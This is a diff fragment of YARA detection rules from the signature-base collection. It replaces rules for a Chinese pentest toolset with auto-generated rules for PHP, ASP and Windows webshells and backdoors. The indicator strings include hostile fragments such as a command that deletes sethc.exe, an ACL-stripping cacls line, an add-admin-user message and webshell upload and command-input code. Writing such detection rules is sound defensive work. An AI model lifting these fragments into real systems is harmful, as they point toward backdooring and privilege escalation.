-		description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
+		description = "Webshells Auto-generated - file KA_uShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38c12697-7e52-5713-a566-6047abfa229b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1175-L1190"
+		id = "34e220db-2fb5-59dc-b5e8-d88f844d3977"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7422-L7434"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
-		logic_hash = "1f673f845ad40efae143ec244c7c70d1e26fb51f22be6bf445085c6a7379f193"
-		score = 70
+		hash = "685f5d4f7f6751eaefc2695071569aab"
+		logic_hash = "58d25e19e2e14a909b4b623a85dfd8c62974121d3b23574d1e94b62385e42b45"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
-		$s3 = "[>] create pipe error" fullword ascii
+		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 340KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V2 : FILE
+rule SIGNATURE_BASE_PHP_Backdoor_V1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
+		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "499b251a-e0e1-5550-825d-acab112be74b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1192-L1208"
+		id = "f47298a9-a47c-5088-ab1f-1bd76bfd0ca8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7435-L7448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a995451d9108687b8892ad630a79660a021d670a"
-		logic_hash = "979f3fe9795798743f2a57aa3b82a34e304774de58ffda5278991cf5a753a8ba"
-		score = 70
+		hash = "0506ba90759d11d78befd21cabf41f3d"
+		logic_hash = "396ae1ee34a06ab4863f4f54257a9020b8747fb99dff15372f0aa54fa4598e43"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LOADER ERROR" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s3 = "2011-2012 T00LS&RICES" fullword wide
+		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_32 : FILE
+rule SIGNATURE_BASE_Svchostdll
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 32.exe"
+		description = "Webshells Auto-generated - file svchostdll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1210-L1226"
+		id = "b369d702-1f29-56ec-a742-f87d9c42c775"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7449-L7468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
-		logic_hash = "819e70979ae1d5e237bbadaa52b504c566b4b7436747ceb0d72e206e4fc45708"
-		score = 70
+		hash = "0f6756c8cb0b454c452055f189e4c3f4"
+		logic_hash = "4a7a7bb7d827c2e7801f8c33b292bb3d312428fc4ae79f07e103f456984c3b83"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "[Undefined OS version]  Major: %d Minor: %d" fullword ascii
-		$s8 = "Try To Run As Administrator ..." fullword ascii
-		$s9 = "Specific LUID NOT found" fullword ascii
+		$s0 = "InstallService"
+		$s1 = "RundllInstallA"
+		$s2 = "UninstallService"
+		$s3 = "&G3 Users In RegistryD"
+		$s4 = "OL_SHUTDOWN;I"
+		$s5 = "SvcHostDLL.dll"
+		$s6 = "RundllUninstallA"
+		$s7 = "InternetOpenA"
+		$s8 = "Check Cloneomplete"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Windows_Mstsc_Enhanced_RMDSTC : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_Server
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
+		description = "Webshells Auto-generated - file server.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f6e94327-cb79-5a7a-88bb-850177558978"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1228-L1243"
+		id = "0e4fee1b-8a16-5738-9600-fa965f8c84c2"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7469-L7480"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
-		logic_hash = "de676b033613beebfe9fc5a71cf5f5911f0af35d34e77d56d222c6f00114dfb6"
-		score = 70
+		hash = "1d38526a215df13c7373da4635541b43"
+		logic_hash = "66b8513a532f64af535c948da28674795ae6495b9844165c3b039bf61c25eb46"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "zava zir5@163.com" fullword wide
-		$s1 = "By newccc" fullword wide
+		$s0 = "<!-- PageServer Below -->"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Mstsc_MSTSCAX : FILE
+rule SIGNATURE_BASE_Vanquish
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
+		description = "Webshells Auto-generated - file vanquish.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9508b613-f897-5277-97e0-30e36fb5d747"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1245-L1261"
+		id = "143e5e46-ffbc-5aee-9f9b-13374a6c3c10"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7481-L7494"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
-		logic_hash = "2bfe10ec4af5d0f32fc03714c0cb01d9b0d446daa67cc0cce0b83f6a57e7c5a5"
-		score = 70
+		hash = "684450adde37a93e8bb362994efc898c"
+		logic_hash = "223c59d06a9389f380fa29959c54e53a17b53080f704189ae519b9527b2c6384"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ResetPasswordWWWx" fullword ascii
-		$s2 = "Terminal Server Redirected Printer Doc" fullword wide
-		$s3 = "Cleaning temp directory" fullword ascii
+		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Scanner : FILE
+rule SIGNATURE_BASE_Winshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
+		description = "Webshells Auto-generated - file winshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1263-L1278"
+		id = "24edd03a-df71-5d84-9764-ba7903b68064"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7495-L7514"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
-		logic_hash = "558abb651ce410520811ca96aaad78710cb9bf597b59ed89d9a678377716d721"
-		score = 70
+		hash = "3144410a37dd4c29d004a814a294ea26"
+		logic_hash = "addbfa598039af09c0e4c50138fcfabd16c35c5516259cf9595cf49855da518d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
-		$s17 = "Team:www.t00ls.net" fullword ascii
+		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+		$s1 = "WinShell Service"
+		$s2 = "__GLOBAL_HEAP_SELECTED"
+		$s3 = "__MSVCRT_HEAP_SELECT"
+		$s4 = "Provide Windows CmdShell Service"
+		$s5 = "URLDownloadToFileA"
+		$s6 = "RegisterServiceProcess"
+		$s7 = "GetModuleBaseNameA"
+		$s8 = "WinShell v5.0 (C)2002 janker.org"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 330KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Gethashes : FILE
+rule SIGNATURE_BASE_FSO_S_Remview
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
+		description = "Webshells Auto-generated - file remview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1280-L1296"
+		id = "5040ddbc-2e61-50ca-b738-a4ac8feec3f1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7515-L7528"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
-		logic_hash = "fb5ab5e6d8b522caf27478b0589b39d06b96fb0f913673ede768a814836e11f8"
-		score = 70
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+		logic_hash = "19719e8c9215ec9ba9fab55b604907e0a6d0a0507a5662926acff1e9dc03440e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii
-		$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii
-		$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii
+		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
+		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 87KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Hashq_Hashq : FILE
+rule SIGNATURE_BASE_Saphpshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
+		description = "Webshells Auto-generated - file saphpshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1298-L1314"
+		id = "42bcd739-714e-5dbf-a3a1-929f3d16ed6f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7529-L7540"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
-		logic_hash = "a71ad182f7dd33790e59badfba6149c6dea627858414f0a8f3e64fd3bb2e2a64"
-		score = 70
+		hash = "d7bba8def713512ddda14baf9cd6889a"
+		logic_hash = "24d558292a709bb29334b1acdc53cdb6c5bc6803caec527edcacd6a19f6dc7c9"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Hashq.exe" fullword wide
-		$s5 = "CnCert.Net" fullword wide
-		$s6 = "Md5 query tool" fullword wide
+		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Shiftbackdoor_Server : FILE
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006Z
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Server.dat"
+		description = "Webshells Auto-generated - file 2006Z.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1316-L1333"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7541-L7553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
-		logic_hash = "17f1d7f2345ed1bc9b240c4851f41891244ec9d13b296a24ab6b42cca32ddf87"
-		score = 70
+		hash = "fd1b6129abd4ab177fed135e3b665488"
+		logic_hash = "4b427132541cd26ee47c387a98f6f46f86808f9a775068e1d114c9ef4abca9f6"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii
-		$s1 = "cacls %s /t /c /e /r administrators" fullword ascii
-		$s2 = "\\dllcache\\sethc.exe" ascii
-		$s3 = "\\ntvdm.exe" ascii
+		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Win2003 : FILE
+rule SIGNATURE_BASE_Admin_Ad
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
+		description = "Webshells Auto-generated - file admin-ad.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1335-L1351"
+		id = "7d87b4f6-3227-53cb-803c-4f9c7327f203"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7554-L7566"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
-		logic_hash = "d1616c53b26eefaa2578efb7defee182e8c88c869cfffb16c8767ddc1869ad46"
-		score = 70
+		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+		logic_hash = "0febd10979a959af73332a8e064a510e949109abf863b5fd0fef19b635968d1d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
-		$s2 = "The shell \"cmd\" success!" fullword ascii
-		$s4 = "Not Windows NT family OS." fullword ascii
+		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Interception3389_Setup : FILE
+rule SIGNATURE_BASE_FSO_S_Casus15
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file setup.exe"
+		description = "Webshells Auto-generated - file casus15.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1353-L1371"
+		id = "305842e4-26ad-573d-8df3-e32e239e434b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7567-L7578"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
-		logic_hash = "d3f543683810a985a190cc3ea8edb7bfcd316d56a13d45c6532c488a4536ad0a"
-		score = 70
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+		logic_hash = "58921290952f23ff5b828d8c92c818ebd91b726cdbbc9137b0f55a0e5ca90636"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii
-		$s1 = "%s\\temp\\temp%d.bat" fullword ascii
-		$s5 = "EventStartShell" fullword ascii
-		$s6 = "del /f /q \"%s\"" fullword ascii
-		$s7 = "\\wminotify.dll" ascii
+		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD_2 : FILE
+rule SIGNATURE_BASE_BIN_Client
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
+		description = "Webshells Auto-generated - file Client.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1373-L1390"
+		id = "515ab1b3-7923-55de-8c19-71ef5d9b4366"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7579-L7595"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
-		logic_hash = "8f33f2999eae3f080e8e5ec51ced3e7d596a07b6e5c9830cc1ca552701ed6502"
-		score = 70
+		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+		logic_hash = "e1277f6b7adc2e832a3aad96c7e44796596d2e61eb9247977da3c3569777e0b2"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cmd.dll" fullword wide
-		$s1 = "cmdpath" fullword ascii
-		$s2 = "Get4Bytes" fullword ascii
-		$s3 = "ExcuteCmd" fullword ascii
+		$s0 = "=====Remote Shell Closed====="
+		$s2 = "All Files(*.*)|*.*||"
+		$s6 = "WSAStartup Error!"
+		$s7 = "SHGetFileInfoA"
+		$s8 = "CreateThread False!"
+		$s9 = "Port Number Error"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11046 : FILE
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Uptime
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
+		description = "Webshells Auto-generated - file uptime.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1392-L1409"
+		id = "4f649757-9502-5640-bc17-11cad6c779f4"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7596-L7611"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
-		logic_hash = "0496e5c062c1a248b118c2f6009c95bfddf753e5491529d4ec43cfaf1ea0c0c5"
-		score = 70
+		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+		logic_hash = "5d91dda859a63a965250bd4d76565c6adf18e4ee306be3b91965e5d35bc521e8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "[*] Token system command" fullword ascii
-		$s1 = "[*] command add user 90sec 90sec" fullword ascii
-		$s2 = "[*] Add to Administrators success" fullword ascii
-		$s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s0 = "JDiamondCSlC~"
+		$s1 = "CharactQA"
+		$s2 = "$Info: This file is packed with the UPX executable packer $"
+		$s5 = "HandlereateConso"
+		$s7 = "ION\\System\\FloatingPo"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Master_Beta_1_7 : FILE
+rule SIGNATURE_BASE_Simple_PHP_Backdoor
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
+		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1411-L1426"
+		id = "bd7c19b9-e035-5e70-b626-1d210cadc055"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7612-L7625"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
-		logic_hash = "13c9cc0bf8aaed2ba86baeee6f0b32bf71108dc1350dcffd03e70393fa975c9f"
-		score = 70
+		hash = "a401132363eecc3a1040774bec9cb24f"
+		logic_hash = "9739217c23f583452fbf1d7a8e20b2f1379ebf430e0a4fd73ad62e88d544670a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://seo.chinaz.com/?host=" fullword ascii
-		$s2 = "Location: getpass.asp?info=" fullword ascii
+		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+		$s9 = "// a simple php backdoor"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 312KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_2 : FILE
+rule SIGNATURE_BASE_Sig_2005Gray
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
+		description = "Webshells Auto-generated - file 2005Gray.asp"
 		author = "Florian Roth (Nextron Systems)"
